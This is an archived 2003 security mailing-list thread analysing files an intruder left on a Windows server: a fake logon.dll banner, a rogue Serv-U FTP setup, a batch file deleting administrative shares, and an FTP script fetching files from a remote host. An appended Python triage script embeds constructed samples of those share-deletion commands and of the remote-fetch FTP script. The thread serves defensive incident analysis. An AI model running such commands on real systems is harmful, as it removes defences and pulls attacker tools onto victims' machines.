Ok, just a quick note to everyone who's wondering about logon.dll. I noticed it was impossibly small (687 bytes, to be precise) and didn't have executable headers. So, I opened it in a text editor... this is what it says:

<begin quote>
          \\ //
          (o o)
###+----oOO--(_)--OOo----+###
||  -=[ HacKd BY THALLIA ]=-  ||
||  -=[ Il est actuellement %TIME ]=-  ||
||  -=[ Vous êtes le %unow ème connecté ]=-  ||
||  -=[ sur un total de %MaxUsers users ]=-  ||
||  -=[ Nombre d'users qui se sont deja connectés %loggedInAll users ]=-  ||
||  -=[ Serveur on ligne depuis %Serverdays Days, %ServerHours Hours, %ServerMins Minutes, %ServerSecs Seconds ]=-  ||
||  -=[ La bande passante utilisée actuellement est %ServerKBps ]=-  ||
||  -=[ Nonbre de Ko Up %ServerKbUp ]=-  ||
||  -=[ Nombre de Ko Dwl %ServerKbDown ]=-  ||
<end quote>

(English translation of the French banner lines, with the %variables left as-is: "HacKd BY THALLIA"; "The time is now %TIME"; "You are connection number %unow"; "out of a total of %MaxUsers users"; "Number of users who have already connected: %loggedInAll users"; "Server online for %Serverdays Days, %ServerHours Hours, %ServerMins Minutes, %ServerSecs Seconds"; "Bandwidth currently in use is %ServerKBps"; "Number of KB up: %ServerKbUp"; "Number of KB down: %ServerKbDown".)

I saw that go2.bat makes a directory in c:\winnt\system32\spool\drivers\color\tmp\a and starts up Serv-U FTP (5 times, apparently). "Log.txt" is used to report various statistics for "Guyver," which I am not familiar with but appears to be some kind of rogue FTP server system. Explorer.exe appears to be the FTP daemon itself.

"Save.bat" does something very interesting... it removes all default administrative shares, which tends to make me think that this is how the machine was hacked in the first place; the hackers are just making sure nobody comes in behind them the same way.

"1.txt" is an FTP script that pulls down log.txt, su.exe (which is also a Serv-U daemon executable... interesting), and ServUDaemon.ini. It connects to an anonymous account on 65.26.36.203 (a RoadRunner cable modem user IP) to retrieve these files.

DWRCS is DameWare's remote control system, much like WinVNC.

Are they sure this system was hacked by a former employee? They should be very, very careful before they go down that path, unless they have some significant information that points to him.
It looks like they had either a vulnerable IIS install (based on logs contained in the RAR file) or default shares that got utilized, from what I've looked at. This is more likely a random hit than anything else.

-----Original Message-----
From: Nick Jacobsen [mailto:nickat_private]
Sent: Thursday, April 03, 2003 3:43 PM
To: incidentsat_private
Subject: Re: Logon.dll? Possible root-kit?

Ok here is a link to a RAR of the suspected files: http://www.ethicsdesign.com/HackLog.rar

As some of you said, it looks like there is not a rootkit installed, and it looks like this was an attempt at making this box join a botnet. A kindly IRCop has offered to both decompile the bot DLL and to remove the offending channel (#thallia), so that is taken care of.

Anyway, I did manage to convince my clients that this was serious enough to warrant a wipe of the data on the machine. I am waiting to see what your analysis of these files is.

Thank You,
Nick Jacobsen
nickat_private

----------------------------------------------------------------------------
Powerful Anti-Spam Management and More... SurfControl E-mail Filter puts the brakes on spam, viruses and malicious code. Safeguard your business critical communications. Download a free 30-day trial: http://www.securityfocus.com/SurfControl-incidents
----------------------------------------------------------------------------
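The reply above triages the dropped files by hand: a "DLL" that is really a text banner, a save.bat that deletes the default administrative shares, and a 1.txt that ftp.exe uses to fetch the Serv-U pieces from a remote host. The script below is an added example (not code from the thread or from HackLog.rar) that automates those three checks. The sample bytes and scripts embedded in it are constructed for the example, the remote address is a documentation IP rather than the one named in the thread, and the function names are this example's own.

```python
"""Triage helpers for the kind of artifacts described in the thread.

All inputs below are constructed samples so the script runs offline; they are
not the real files from HackLog.rar.
"""
import re

# A fake "logon.dll": a text banner with no MZ header, like the 687-byte file.
FAKE_LOGON_DLL = (
    b"###+----oOO--(_)--OOo----+###\r\n"
    b"||  -=[ HacKd BY THALLIA ]=-  ||\r\n"
    b"||  -=[ Il est actuellement %TIME ]=-  ||\r\n"
)

# A minimal stand-in for a real PE: the DOS 'MZ' magic plus a 64-byte DOS header.
FAKE_REAL_DLL = b"MZ\x90\x00" + b"\x00" * 60

# A constructed save.bat that, like the one described, drops the admin shares.
FAKE_SAVE_BAT = """@echo off
net share C$ /delete
net share ADMIN$ /delete
net share IPC$ /delete
rem nothing else
net share D$ /delete
"""

# A constructed ftp.exe -s: script in the shape the thread describes for 1.txt.
# 192.0.2.10 is a documentation address standing in for the real drop host.
FAKE_FTP_SCRIPT = """open 192.0.2.10
anonymous
guest@
binary
get log.txt
get su.exe
get ServUDaemon.ini
bye
"""

# Default administrative shares on NT/2000: ADMIN$, IPC$ and one per drive (C$...).
_DRIVE_SHARE = re.compile(r"^[A-Z]\$$")
_NAMED_ADMIN_SHARES = {"ADMIN$", "IPC$"}


def looks_like_pe(data):
    """True if the file starts with the DOS 'MZ' magic and can hold a DOS header.

    A text file renamed to .dll fails this check regardless of its extension.
    """
    return len(data) >= 64 and data[:2] == b"MZ"


def deleted_shares(batch_text):
    """Return the share names removed with 'net share <name> /delete'."""
    pat = re.compile(r"^\s*net\s+share\s+(\S+)\s+/delete\b", re.IGNORECASE | re.MULTILINE)
    return [m.group(1).upper() for m in pat.finditer(batch_text)]


def removes_admin_shares(batch_text):
    """True if the batch file deletes any default administrative share."""
    return any(
        name in _NAMED_ADMIN_SHARES or _DRIVE_SHARE.match(name)
        for name in deleted_shares(batch_text)
    )


def parse_ftp_script(text):
    """Extract host, login name and fetched files from an ftp.exe -s: script.

    After 'open <host>', ftp.exe reads the next two lines as user and password.
    """
    lines = [line.strip() for line in text.splitlines() if line.strip()]
    host, user, files = None, None, []
    for i, line in enumerate(lines):
        parts = line.split()
        cmd = parts[0].lower()
        if cmd == "open" and len(parts) > 1:
            host = parts[1]
            if i + 1 < len(lines):
                user = lines[i + 1]
        elif cmd in ("get", "mget") and len(parts) > 1:
            files.extend(parts[1:])
    return {"host": host, "user": user, "files": files}


def triage(dll_bytes, save_bat, ftp_script):
    """Run the three checks and return a list of findings as plain strings."""
    findings = []
    if not looks_like_pe(dll_bytes):
        findings.append("dll-is-not-pe")
    if removes_admin_shares(save_bat):
        findings.append("admin-shares-deleted:" + ",".join(deleted_shares(save_bat)))
    ftp = parse_ftp_script(ftp_script)
    if ftp["host"]:
        findings.append("ftp-fetch:%s:%s:%s" % (ftp["host"], ftp["user"], ",".join(ftp["files"])))
    return findings


if __name__ == "__main__":
    for finding in triage(FAKE_LOGON_DLL, FAKE_SAVE_BAT, FAKE_FTP_SCRIPT):
        print(finding)
```

Pointing the same functions at the real files means reading them with open(path, "rb") for the DLL and open(path) for the two scripts; the MZ check is the quickest way to confirm the "impossibly small" DLL observation without a disassembler, and the parsed host and file list from 1.txt are the indicators worth blocking and searching other hosts for.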
This archive was generated by hypermail 2b30 : Fri Apr 04 2003 - 16:44:06 PST